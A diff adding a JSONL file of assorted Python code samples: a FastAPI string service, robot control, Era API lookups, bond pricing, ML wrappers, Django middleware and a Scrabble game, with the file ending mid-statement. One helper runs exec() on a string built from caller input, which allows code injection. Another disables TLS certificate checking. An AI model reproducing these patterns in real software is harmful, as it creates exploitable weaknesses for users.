diff --git "a/6518.jsonl" "b/6518.jsonl" new file mode 100644--- /dev/null +++ "b/6518.jsonl" @@ -0,0 +1,669 @@ +{"seq_id":"389790007","text":"\"\"\"LCS web app.\"\"\"\nfrom pathlib import Path\nfrom typing import List, Sequence\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel, Field, validator\nfrom starlette.applications import Starlette\nfrom starlette.responses import RedirectResponse\nfrom starlette.staticfiles import StaticFiles\n\nfrom lcs.main import matches\n\n\nAPI = FastAPI(title=\"LCS\", description=\"Longest Common String\")\nAPP = Starlette()\n\n\nclass String(BaseModel):\n \"\"\"Individual string item.\"\"\"\n\n value: str = Field(\n min_length=1, max_length=1024,\n )\n\n\nclass SetOfStrings(BaseModel):\n \"\"\"Set of strings to query for LCS.\"\"\"\n\n setOfStrings: List[String] = Field(min_items=2, max_items=1024)\n\n @validator(\"setOfStrings\")\n def _check_and_convert(cls, values):\n strs = [x_.value for x_ in values]\n if len(strs) != len(set(strs)):\n raise ValueError(\"strings must be unique.\")\n return strs\n\n\nclass LCSResults(BaseModel):\n \"\"\"Longest common substring results.\"\"\"\n\n lcs: Sequence[String]\n\n\n@API.post(\"/\", response_model=LCSResults, tags=[\"Query\"])\nasync def query(strings: SetOfStrings):\n \"\"\"Endpoint to search for LCS.\"\"\"\n return LCSResults(lcs=[String(value=x_) for x_ in matches(strings.setOfStrings)])\n\n\n@API.get(\"/\", tags=[\"Redirect\"])\nasync def to_docs():\n \"\"\"Redirects from API root to OpenAPI documentation.\"\"\"\n return RedirectResponse(url=\"/lcs/docs\")\n\n\ndef main():\n \"\"\"Attach mounts and routes.\"\"\"\n web_dir = Path(__file__).parent.joinpath(\"html\")\n APP.add_route(\"/\", StaticFiles(directory=web_dir, html=True), name=\"home\")\n APP.mount(\"/css\", StaticFiles(directory=web_dir.joinpath(\"css\")), name=\"css\")\n APP.mount(\"/lcs\", API, name=\"api\")\n\n\nif __name__ == \"__main__\":\n raise RuntimeError(\"These aren't the droids you're looking for.\")\n\nmain()\n","sub_path":"src/lcs/web/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412165654","text":"\n\nfrom xai.brain.wordbase.verbs._vitiate import _VITIATE\n\n#class header\nclass _VITIATING(_VITIATE, ):\n\tdef __init__(self,): \n\t\t_VITIATE.__init__(self)\n\t\tself.name = \"VITIATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"vitiate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_vitiating.py","file_name":"_vitiating.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"304849708","text":"def print_obj_key(obj,key):\n import json\n with open(obj) as f:\n data = json.load(f)\n #print(data)\n keystr = key\n #print(keystr)\n str = \"print(data\"\n #print(str)\n #print(len(keystr))\n while len(keystr)>0:\n str = str + \"['\" + keystr[0:1] + \"']\"\n #print(str)\n keystr = keystr[2:]\n #print(keystr)\n #print(len(keystr))\n str = str + ')'\n #print(str)\n exec(str)\n","sub_path":"f_output_obj_key.py","file_name":"f_output_obj_key.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"421325934","text":"#! 
/usr/bin/python3\n\nfrom Communication_Interfaces import Communication_Interfaces\nfrom Open_Interface import Open_Interface\nfrom SRF08 import SRF08\nfrom time import sleep\nimport os\nimport sys\n\ndef wander(OI, SRL, SRR):\n SRL.do_ranging()\n SRR.do_ranging()\n OI.Get_All_Sensors()\n\n nearest_left = SRL.ranges[0]\n nearest_right = SRR.ranges[0]\n \n next_nearest_left = SRL.ranges[1]\n next_nearest_right = SRR.ranges[1]\n\n left = next_nearest_right - (next_nearest_right - nearest_right)\n right = next_nearest_left - (next_nearest_left - nearest_left)\n\n print(nearest_left, nearest_right, next_nearest_left, next_nearest_right, left, right)\n\n OI.Drive_Direct(left, right)\n\n# print(\"SRL light: {0}\\tRanges: {1}\".format(SRL.light, SRL.ranges))\n# print(\"SRR light: {0}\\tRanges: {1}\".format(SRR.light, SRR.ranges))\n# print(\"Bumps L R: {0} {1}\".format(OI.Bump_Left(), OI.Bump_Right())\n# print(\"Wheeldrop L R C: {0} {1} {2}\".format(OI.Wheeldrop_Left(), OI.Wheeldrop_Right(), OI.Wheeldrop_Caster())\n# print(\"Wall Seen: {0}\".format(OI.Wall_Seen())\n# print(\"Cliff Seen L FL FR R: {0} {1} {2} {3}\".format(OI.Cliff_Seen_Left(), OI.Cliff_Seen_Front_Left(), OI.Cliff_Seen_Front_Right(), OI.Cliff_Seen_Right())\n# print(\"Virtual Wall Seen: {0}\".format(OI.Virtual_Wall_Seen())\n# print(\"Overcurrent LSD0 LSD1 LSD2 LW RW: {0} {1} {2} {3} {4}\".format(OI.Overcurrent_LSD0(), OI.Overcurrent_LSD1(), OI.Overcurrent_LSD2(), OI.Overcurrent_Left_Wheel(), OI.Overcurrent_Right_Wheel())\n# print(\"IR Byte: {0}\".format(OI.IR_Byte())\n# print(\"Buttons Advance Play: {0} {1}\".format(OI.Button_Play_Pressed(), OI.Button_Advance_Pressed())\n# print(\"Last Distance Angle: {0} {1}\".format(OI.Last_Distance(), OI.Last_Angle())\n# print(\"Charging State: {0}\".format(OI.Charging_State())\n# print(\"Battery Voltage Current Temp Charge Capacity: {0} {1} {2} {3} {4}\".format(OI.Battery_Voltage(), OI.Battery_Current(), OI.Battery_Temperatur(), OI.Battery_Charge(), OI.Battery_Capacity()))\n# print(\"Wall Signal: {0}\".format(OI.Wall_Signal()))\n# print(\"Cliff Signal L FL FR R: {0} {1} {2} {3}\".format(OI.CLiff_Left_Signal(), OI.Cliff_Front_Left_Signal(), OI.Cliff_Front_Right_Signal(), OI.Cliff_Right_Signal()))\n# print(\"Charging HomeBase Internal: {0} {1}\".format(OI.Charging_Home_Base(), OI.Charging_Internal()))\n# print(\"OI Mode: {0}\".format(OI.OI_Mode()))\n# print(\"Last DriveVel DriveRad RightVel LeftVel: {0} {1} {2} {3}\".format(OI.Last_Drive_Velocity(), OI.Last_Drive_Radius(), OI.Last_Right_Velocity(), OI.Last_Left_Velocity()))\n\nif __name__ == \"__main__\":\n CI = Communication_Interfaces()\n OI = Open_Interface(CI.uart_read, CI.uart_write)\n SRL = SRF08(CI.i2c_read, CI.i2c_write, 0x72)\n SRR = SRF08(CI.i2c_read, CI.i2c_write, 0x76)\n\n while (True):\n wander(OI, SRL, SRR)\n if (OI.Wheeldrop_Caster() == True):\n OI.Start()\n sys.exit()\n\n","sub_path":"wander.py","file_name":"wander.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"391088256","text":"# Task name: get profile details of Era DB\n# Description: The purpose of this script is to get the profile IDs used to provision Oracle DB on ERA\n#\n# Version: v1.0\n# Author: Husain Ebrahim \n\n# ERA API call function\n# ================================================================\nimport requests\n\n\ndef get_cluster_id(name=''):\n url = '{}/clusters'.format(base_url)\n resp = requests.get(url, **kwargs)\n if resp.status_code == 200:\n return resp.json()[0]['id']\n\n\ndef 
get_all_parameters(profiles):\n url = '{}/profiles'.format(base_url)\n resp = requests.get(url, **kwargs)\n if resp.status_code == 200:\n for profile in resp.json():\n if profile['topology'] == 'ALL' or profile['topology'] == 'single':\n if profile['engineType'] == 'Generic' or profile['engineType'] == 'oracle_database':\n profiles[profile['type'].lower()] = {'id': profile['id'],\n 'name': profile['name'],\n 'version': profile['versions'][0]['id']}\n\n return profiles\n\n\ndef get_sla_id(sla_name='NONE'):\n url = '{}/slas'.format(base_url)\n resp = requests.get(url, **kwargs)\n\n if resp.status_code == 200:\n for sla in resp.json():\n if sla['name'] == sla_name:\n return sla['id']\n\n# ##########################################################################################\n# Main task function\n# ##########################################################################################\n\n\nbase_url = 'https://@@{ERA_IP}@@/era/v0.9'\nkwargs = {\n 'verify': False,\n 'auth': ('@@{ERA_USERNAME}@@', '@@{ERA_PASSWORD}@@')\n}\nprofiles = {\n 'software': {'name': '@@{SOFTWARE_PROFILE}@@', 'id': ''},\n 'compute': {'name': '@@{COMPUTE_PROFILE}@@', 'id': ''},\n 'network': {'name': '@@{NETWORK_PROFILE}@@', 'id': ''},\n 'database_parameter': {'name': '@@{DATABASE_PARAMETER}@@', 'id': ''}\n}\n\ndb_name = '@@{DB_NAME}@@'\n\ncluster_id = get_cluster_id()\nprofiles = get_all_parameters(profiles)\nsla_id = get_sla_id()\n\nprint('CLUSTER_ID={}'.format(cluster_id))\nprint('SOFTWARE_ID={}'.format(profiles['software']['id']))\nprint('SOFTWARE_VERSION={}'.format(profiles['software']['version']))\nprint('COMPUTE_ID={}'.format(profiles['compute']['id']))\nprint('NETWORK_ID={}'.format(profiles['network']['id']))\nprint('DB_PARAMETER={}'.format(profiles['database_parameter']['id']))\nprint('SLA_ID={}'.format(sla_id))\n\n","sub_path":"blueprints/era_oracle/scripts/era_get_profile_ids.py","file_name":"era_get_profile_ids.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"114197790","text":"from __future__ import division\nimport numpy as np\nimport scipy.misc\nfrom scipy.optimize import newton\nfrom copy import copy\nfrom curve import Curve\n\nBP = 0.0001\n\n\nclass CashFlow(object):\n\n def __init__(self, cashflow):\n if type(cashflow) is dict:\n self._cashflow = cashflow\n elif type(cashflow[0]) is tuple:\n self._cashflow = {t: Ct for t, Ct in cashflow}\n\n def __repr__(self):\n t, C = self.profile\n return '{}\\n{}'.format(str(t), str(C))\n\n def __getitem__(self, t):\n if t not in self._cashflow:\n return 0\n else:\n return self._cashflow[t]\n\n def __mul__(self, scalar):\n __cashflow_copy = copy(self._cashflow)\n for t in __cashflow_copy:\n __cashflow_copy[t] *= scalar\n return CashFlow(__cashflow_copy)\n\n def __add__(self, cashflow):\n __cashflow_copy = copy(self._cashflow)\n for t in cashflow.cashflow_tuples:\n if t not in __cashflow_copy:\n __cashflow_copy[t] = cashflow[t]\n else:\n __cashflow_copy[t] += cashflow[t]\n return CashFlow(__cashflow_copy)\n\n @property\n def cashflow_tuples(self):\n return self._cashflow\n\n @property\n def profile(self):\n profile = [(t, Ct) for t, Ct in self._cashflow.items()]\n profile = sorted(profile, key=lambda a: a[0])\n t = map(lambda a: a[0], profile)\n C = map(lambda a: a[1], profile)\n return t, C\n\n @classmethod\n def CouponBond(cls, par, c, t0, T, n=2):\n cashflow, t, C = dict(), t0 + 1 / n, c * par / n\n while t <= T:\n cashflow[t] = C\n t += 1 / n\n if T in cashflow:\n 
cashflow[T] += par\n else:\n cashflow[T] = par\n return cls(cashflow)\n\n @classmethod\n def Annuity(cls, A, t0, T, n=2):\n cashflow, t = dict(), t0 + 1 / n\n while t <= T:\n cashflow[t] = A / n\n t += 1 / n\n return cls(cashflow)\n\n @staticmethod\n def replicate(target, securities):\n t, C = target.profile\n C = np.array(C).reshape(len(C), 1)\n cashflow_space = np.array([\n [security[tau] for tau in t]\n for security in securities\n ]).T\n w = np.linalg.solve(cashflow_space, C)\n return w, cashflow_space\n\n def price(self, disc):\n price = 0\n if type(disc) is dict:\n for t, Ct in self._cashflow.items():\n assert (t in disc)\n price += Ct * disc[t]\n elif hasattr(disc, '__call__'):\n for t, Ct in self._cashflow.items():\n price += Ct * disc(t)\n else:\n raise TypeError\n return price\n\n def derivative(self, y, order):\n def __price_with_single_rate(__y):\n return self.price(Curve.SingleRateCurve(__y))\n return scipy.misc.derivative(\n __price_with_single_rate, x0=y,\n dx=1e-5, n=order)\n\n def dv01(self, y):\n return -self.derivative(y, 1) * BP\n\n def duration(self, y):\n return -self.derivative(y, 1) / self.price(\n Curve.SingleRateCurve(y))\n\n def convexity(self, y):\n return self.derivative(y, 2) / self.price(\n Curve.SingleRateCurve(y))\n\n\n\nif __name__ == '__main__':\n ln = Curve.LinearInterpolation([(0.5, 1/1.01), (15, 1/(1.025**30))])\n a1 = CashFlow.Annuity(1, 0, 10)\n a2 = CashFlow.Annuity(10, 0, 5)\n zcb = CashFlow({10: 100})\n cb = CashFlow.CouponBond(100, 10000, 0, 10)\n print(1/ln(10))\n print(ln.calibrate(a1, a1.price(ln)))\n print(ln.calibrate(a2, a2.price(ln)))\n print(Curve.calibrate(zcb, zcb.price(ln)))\n print(Curve.calibrate(cb, cb.price(ln)))","sub_path":"cashflow.py","file_name":"cashflow.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"304638614","text":"# Check if a given string is a palindrome or not\n# Returns 0 if string is not a palindrome\n# O(n) running time where n is the size of the input string\ndef palindromeStringCheck(s):\n size = len(s)\n i,j = 0,len(s)-1\n while(i<j and j>=0):\n if s[i] != s[j]:\n return 0\n i+=1\n j-=1\n return 1\n\npalindromeStringCheck('abcba')","sub_path":"palindromeStringCheck.py","file_name":"palindromeStringCheck.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"277816329","text":"import re\nimport unittest\nfrom project import create_app, db\nfrom project.serate.models import Serata\nfrom project.corsi.models import Corso\nfrom project.tags.models import Tag\n\nclass FlaskClientTestCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n Tag.insert_test_tags()\n self.client = self.app.test_client()\n #self.client = self.app.test_client(use_cookies=True)\n '''\n self.client instance variable is the Flask test client object. 
\n This object exposes methods that issue requests into the application\n \n When the test client is created with the use_cookies option enabled, \n it will accept and send cookies in the same way browsers do, so functionality\n that relies on cookies to recall context between requests can be used\n '''\n\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_lista_serate(self):\n response = self.client.get('/serate/prossime')\n self.assertEqual(response.status_code, 200)\n self.assertTrue('Python Biella Group' in response.get_data(as_text=True))\n\n def test_lista_tags(self):\n response = self.client.get('/tags/')\n # Function visible only to authenticated users\n self.assertEqual(response.status_code, 302)\n\n","sub_path":"Flask/Lezione7/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"138512960","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 18 18:09:49 2017\r\n\r\n@author: lihepeng\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\ndef ewh_pmin_pmax(T_old, flow_rate):\r\n \r\n delta_t = 1/12\r\n \r\n Tin = 60\r\n T_air = 75\r\n d = 8.34\r\n Cp = 1.0069\r\n volume = 15\r\n SA = 24.1\r\n R = 15/3\r\n Q = 3412\r\n \r\n C = volume * d * Cp\r\n G = SA / R\r\n B = d * flow_rate * Cp\r\n R1 = 1/(G + B)\r\n \r\n coff = np.exp(-delta_t/(R1*C))\r\n \r\n pmin_ewh = ( (120 - T_old * coff) / (1 - coff) - G*R1*T_air - B*R1*Tin ) / (delta_t*Q*R1)\r\n \r\n pmax_ewh = ( (130 - T_old * coff) / (1 - coff) - G*R1*T_air - B*R1*Tin ) / (delta_t*Q*R1)\r\n \r\n return pmin_ewh, pmax_ewh\r\n ","sub_path":"data_process/ewh_pmin_pmax.py","file_name":"ewh_pmin_pmax.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"266116473","text":"\"\"\"\nThis module contains helper methods that wrap sklearn prediction models.\n\"\"\"\nimport pandas as pd\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier, BaggingClassifier, \\\n AdaBoostClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom .result import PredictionResult, ResultCollection\nfrom .util import wrap_list\n\nclass Trainer:\n \"\"\"\n Provides model training methods for a particular set of training data.\n \"\"\"\n def __init__(self, *dfs, label_colname=None, seed=None):\n self.dfs = dfs\n self.label_colname = label_colname\n self.seed = seed\n\n\n def dummy(self):\n \"\"\"\n Returns dummy classifier models using the 'stratified' technique.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = DummyClassifier(random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def logistic_regression(self, penalty='l2'):\n \"\"\"\n Returns logistic regression models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = LogisticRegression(solver='liblinear',\n penalty=penalty,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def decision_tree(self, max_depth=None):\n \"\"\"\n Returns decision tree models fitted to the training 
data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = DecisionTreeClassifier(max_depth=max_depth,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def k_nearest(self, k=5):\n \"\"\"\n Returns k-nearest neighbors models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = KNeighborsClassifier(n_neighbors=k)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def linear_svm(self, c=1):\n \"\"\"\n Returns linear svm models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n # Prefer dual=False when n_samples > n_features\n model = Pipeline([('scale', StandardScaler()),\n ('svm', LinearSVC(C=c, dual=False,\n random_state=self.seed))])\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def forest(self, n_trees=10):\n \"\"\"\n Returns random forest models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = RandomForestClassifier(n_estimators=n_trees,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def bagging(self, n_estimators=10):\n \"\"\"\n Returns bagging models fitted to the training data.\n\n Underlying base estimator is a decision tree.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = BaggingClassifier(n_estimators=n_estimators,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def boosting(self, n_estimators=10):\n \"\"\"\n Returns boosting models fitted to the training data.\n\n Underlying base estimator is a decision tree.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = AdaBoostClassifier(n_estimators=n_estimators,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def train_all(self, parameters={}, exclude=[]):\n \"\"\"\n Train all the things.\n\n Returns a dictionary with method names as keys and models as values.\n \"\"\"\n methods = {\n 'dummy': self.dummy,\n 'logistic_regression': self.logistic_regression,\n 'decision_tree': self.decision_tree,\n 'k_nearest': self.k_nearest,\n 'linear_svm': self.linear_svm,\n 'forest': self.forest,\n 'bagging': self.bagging,\n 'boosting': self.boosting\n }\n\n models = dict()\n\n for name, func in methods.items():\n if name in exclude:\n continue\n\n params = parameters.get(name) or {}\n models[name] = func(**params)\n\n return models\n\n\n def _training_data(self):\n for df in self.dfs:\n X = df.drop(columns=[self.label_colname]).values\n y = df[self.label_colname].values\n yield X, y\n\n\nclass Tester:\n \"\"\"\n Provides test methods for a particular set of test data.\n \"\"\"\n def __init__(self, *dfs, label_colname=None):\n self.dfs = dfs\n self.label_colname = label_colname\n\n\n def test(self, *models, threshold=None):\n \"\"\"\n Uses the fitted models to generate a prediction result dataframe.\n\n Model results are \"stacked\": They are assumed to be the results of the\n same conceptual model applied to different splits.\n \"\"\"\n results = self._test(*models, threshold=threshold)\n if len(results) > 1:\n return ResultCollection.from_stack(results)\n else:\n return results[0]\n\n\n def _test(self, *models, threshold=None):\n if len(models) != len(self.dfs):\n raise 
Exception(f\"Number of models ({len(models)}) does not match\"\n f\" test sets ({len(self.dfs)}).\")\n\n results = []\n for (X, y_actual), model in zip(self._test_data(), models):\n if isinstance(model, Pipeline) and \\\n isinstance(model.named_steps.svm, LinearSVC):\n y_score = model.decision_function(X)\n else:\n y_score = model.predict_proba(X)[:,1]\n\n y_predict = model.predict(X)\n df_results = pd.DataFrame({ 'actual': y_actual,\n 'score': y_score,\n 'predict': y_predict },\n dtype=float)\n results.append(PredictionResult(df_results))\n\n if threshold:\n results = [r.with_threshold(threshold) for r in results]\n\n return results\n\n\n def evaluate(self, model_dict, thresholds=None):\n \"\"\"\n Tests lots of different models at different thresholds.\n \"\"\"\n collection = ResultCollection()\n for name, model in model_dict.items():\n result = self._test(model)[0] # Hack for now\n\n if thresholds:\n results = result.with_thresholds(thresholds)\n this_collection = ResultCollection.from_stack(results,\n index=thresholds)\n collection.join(name, this_collection)\n else:\n collection.join(name, result)\n\n return collection\n\n\n def evaluate_splits(self, model_dict, threshold=None):\n \"\"\"\n Tests lots of different models over different splits.\n \"\"\"\n collection = ResultCollection()\n for name, models in model_dict.items():\n results = self._test(*models, threshold=threshold)\n this_collection = ResultCollection.from_stack(results)\n collection.join(name, this_collection)\n\n return collection\n\n\n def _test_data(self):\n for df in self.dfs:\n X = df.drop(columns=[self.label_colname]).values\n y_actual = df[self.label_colname].values\n yield X, y_actual\n","sub_path":"hw3/pipeline/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":8500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"250157294","text":"import logging\n\nfrom django.http import Http404\n\nfrom hitch import request_local_context\nfrom hitch.support.util import format_mapped_data\n\nlog = logging.getLogger('hitch')\n\nclass RequestMiddleware(object):\n def process_request(self, request):\n request_local_context.request = request\n \n chain = request.META.get('HTTP_X_FORWARDED_FOR')\n if chain:\n request.ip = chain.split(',')[0].strip()\n else:\n request.ip = request.META.get('REMOTE_ADDR')\n \n request.posting = (request.method == 'POST')\n request.scheme = ('https' if request.META.get('HTTPS') in ('on', '1') else 'http')\n\nclass UncaughtExceptionMiddleware(object):\n def process_exception(self, request, exception):\n if isinstance(exception, Http404):\n return\n \n lines = ['UNCAUGHT %s: %s' % (type(exception).__name__, str(exception))]\n if request.GET:\n lines.append('GET: %s' % format_mapped_data(request.GET))\n elif request.POST:\n lines.append('POST: %s' % format_mapped_data(request.POST))\n log.exception('\\n'.join(lines))","sub_path":"hitch/support/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"142688051","text":"from guizero import*\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nimport string\r\nimport random\r\n\r\napp = App(layout=\"grid\",title=\"Skrabble\",width=800,height=705)\r\n\r\nalphabet = list(string.ascii_uppercase)\r\n\r\ndef Play():\r\n global DrawButton,z,no_of_players,NextButton \r\n message1.visible=False\r\n combo.visible=False\r\n playbutton.visible=False\r\n 
no_of_players = int(combo.value)\r\n AddInfo()\r\n AddBag()\r\n text = \"Click to take a tile from the bag!\\nTiles remaining: \"+str(len(alltiles))\r\n DrawButton = PushButton(app,grid=[0,6,4,1],text=text,command=TakeTile)\r\n DrawButton.text_size=15\r\n DrawButton.bg=\"powder blue\"\r\n ShowHand()\r\n NextButton = PushButton(app,grid=[0,13,4,1],text=\"Finish Turn\",enabled=False,command=NextTurn)\r\n NextButton.text_size=15\r\n NextButton.bg=\"red\"\r\n NextTurn()\r\n\r\ndef AddDialogue():\r\n global message1,combo,playbutton\r\n ctrlframe = Box(app,layout=\"grid\",grid=[0,0,4,17],width=583,height=705)\r\n message1 = Text(app, grid=[0,4,4,1],text=\"How many players?\",size=30,width = 25)\r\n combo = Combo(app,options=[2,3,4],width=10,grid=[0,8,4,1])\r\n combo.text_size=20\r\n combo.bg=\"white\"\r\n playbutton = PushButton(app,text=\"PLAY\",grid=[0,12,4,1],width=7,command=Play)\r\n playbutton.text_size=50\r\n playbutton.bg=\"green2\"\r\n\r\nAddDialogue()\r\n\r\nx3word = [18,25,32,137,151,256,263,270]\r\nx2word = [36,48,54,64,72,80,90,96,144,192,198,208,216,224,234,240,252]\r\nx3letter = [40,44,104,108,112,116,172,176,180,184,244,248]\r\nx2letter = [21,29,58,60,69,76,83,122,126,128,132,140,148,156,\r\n 160,162,166,205,212,219,228,230,259,267]\r\n\r\ndef BoardDesign(a,last):\r\n\r\n\r\n if a in x3word:\r\n squares[last].tk.configure(bg=\"red\",font=\"Helvetica 9 bold\")\r\n squares[last].text=\"TRIPLE\\nWORD\\nSCORE\"\r\n \r\n elif a in x2word:\r\n squares[last].tk.configure(bg=\"LightPink2\",font=\"Helvetica 9 bold\")\r\n squares[last].text=\"DOUBLE\\nWORD\\nSCORE\"\r\n \r\n elif a in x3letter:\r\n squares[last].tk.configure(bg=\"dodger blue\",font=\"Helvetica 9 bold\")\r\n squares[last].text=\"TRIPLE\\nLETTER\\nSCORE\"\r\n\r\n elif a in x2letter:\r\n squares[last].tk.configure(bg=\"light blue\",font=\"Helvetica 9 bold\")\r\n squares[last].text=\"DOUBLE\\nLETTER\\nSCORE\"\r\n else:\r\n squares[last].bg=\"light sea green\"\r\n squares[last].text=\"\"\r\n\r\ntileindex = \"\"\r\n\r\ndef SelectSquare(a):\r\n global tileindex,TilesUsed\r\n\r\n if squares[a].bg == \"light goldenrod\":\r\n return # committed tiles are locked on the board\r\n if squares[a].bg == \"goldenrod1\":\r\n UsedIndex = SquaresUsed.index(a)\r\n hand[TilesUsed[UsedIndex]].text=squares[a].text\r\n hand[TilesUsed[UsedIndex]].bg=\"light goldenrod\"\r\n hand[TilesUsed[UsedIndex]].enabled=True\r\n hand[TilesUsed[UsedIndex]].text_color=\"black\"\r\n TilesUsed.pop(UsedIndex)\r\n SquaresUsed.remove(a) \r\n BoardDesign(a,a)\r\n else:\r\n if tileindex != \"\":\r\n squares[a].tk.configure(bg=\"goldenrod1\",font=\"Helvetica 9 bold\")\r\n squares[a].text=hand[tileindex].text\r\n hand[tileindex].bg=\"SystemButtonFace\"\r\n hand[tileindex].text=\"\"\r\n hand[tileindex].enabled=False\r\n TilesUsed.append(tileindex)\r\n SquaresUsed.append(a)\r\n tileindex = \"\"\r\n\r\ndef SetBoard():\r\n global a,squares,boardframe\r\n global squares\r\n boardframe = Box(app,layout=\"grid\",grid=[4,0,1,17])\r\n boardframe.bg=\"turquoise4\"\r\n squares = list()\r\n y = 0\r\n x = 0\r\n for a in range(289):\r\n if a % 17 == 0 and a!=0:\r\n y += 1\r\n x -= 17 \r\n if x in [0,16]:\r\n row = a//17\r\n squares.append(Text(boardframe,grid=[x,y],\r\n text=alphabet[row-1],color=\"white\",\r\n width=2,height=1))\r\n elif y in [0,16]:\r\n squares.append(Text(boardframe,grid=[x,y],\r\n text=x,color=\"white\",\r\n width=3))\r\n else:\r\n squares.append(PushButton(boardframe,grid=[x,y],width=3,height=1,\r\n command=lambda a=a: SelectSquare(a))) \r\n squares[-1].tk.configure(borderwidth=2)\r\n last=-1\r\n 
BoardDesign(a,last)\r\n if squares[-1].value in [\"Z\",\"P\"]:\r\n squares[-1].value=\"\"\r\n x += 1\r\n\r\nSetBoard()\r\n\r\ndef AddInfo():\r\n global playerinfo,scores\r\n playerinfo = list()\r\n scores = []\r\n for z in range(no_of_players):\r\n scores.append(0)\r\n text = \"Player \"+str(z+1)+\"\\n\\nScore: \"+str(scores[z])\r\n playerinfo.append(PushButton(app,text=str(text),grid=[z,0],width=8))\r\n playerinfo[-1].text_size=15\r\n playerinfo[-1].bg=\"white\"\r\n if no_of_players==2:\r\n playerinfo[-1].grid=[2*z,0,2,1]\r\n playerinfo[-1].width=17\r\n if no_of_players==3:\r\n playerinfo[-1].width=10\r\n if z == 1:\r\n playerinfo[-1].grid=[z,0,2,1]\r\n if z == 2:\r\n playerinfo[-1].grid=[3,0]\r\n \r\n\r\nturn=0\r\nmovecount=0\r\n\r\nTilesUsed = []\r\nSquaresUsed = []\r\n\r\nalignment = \"null\"\r\n\r\ndef AddScore():\r\n global alignment\r\n if SquaresUsed != []:\r\n if len(SquaresUsed) !=1:\r\n diff = abs(SquaresUsed[0]-SquaresUsed[1])\r\n if diff < 17:\r\n alignment = \"horizontal\"\r\n else:\r\n alignment = \"vertical\"\r\n print(alignment)\r\n else:\r\n alignment = \"vertical\"\r\n \r\n words = [] \r\n for i in SquaresUsed:\r\n word = [] \r\n if alignment == \"vertical\":\r\n #print(SquaresUsed)\r\n checkleft = 1\r\n Scanleft = True\r\n \r\n while Scanleft == True:\r\n if squares[i-checkleft].bg == \"light goldenrod\":\r\n #print(squares[i-checkleft].text)\r\n word.append(squares[i-checkleft].text)\r\n else:\r\n Scanleft = False \r\n checkleft+=1\r\n\r\n word.append(squares[i].text)\r\n \r\n Scanright = True\r\n checkright = 1\r\n while Scanright == True:\r\n if squares[i+checkright].bg == \"light goldenrod\":\r\n #if len(squares[i+checkright].text) == 1:\r\n #print(squares[i+checkright].text)\r\n word.append(squares[i+checkright].text)\r\n else:\r\n Scanright = False \r\n checkright+=1\r\n\r\n #print(word)\r\n if len(word) > 1:\r\n words.append(word)\r\n print(words)\r\n \r\n\r\n \r\n scoremultiply = 1\r\n score = 0\r\n for i in SquaresUsed:\r\n #print(i)\r\n letter = squares[i].text\r\n #print(letter)\r\n letterindex = 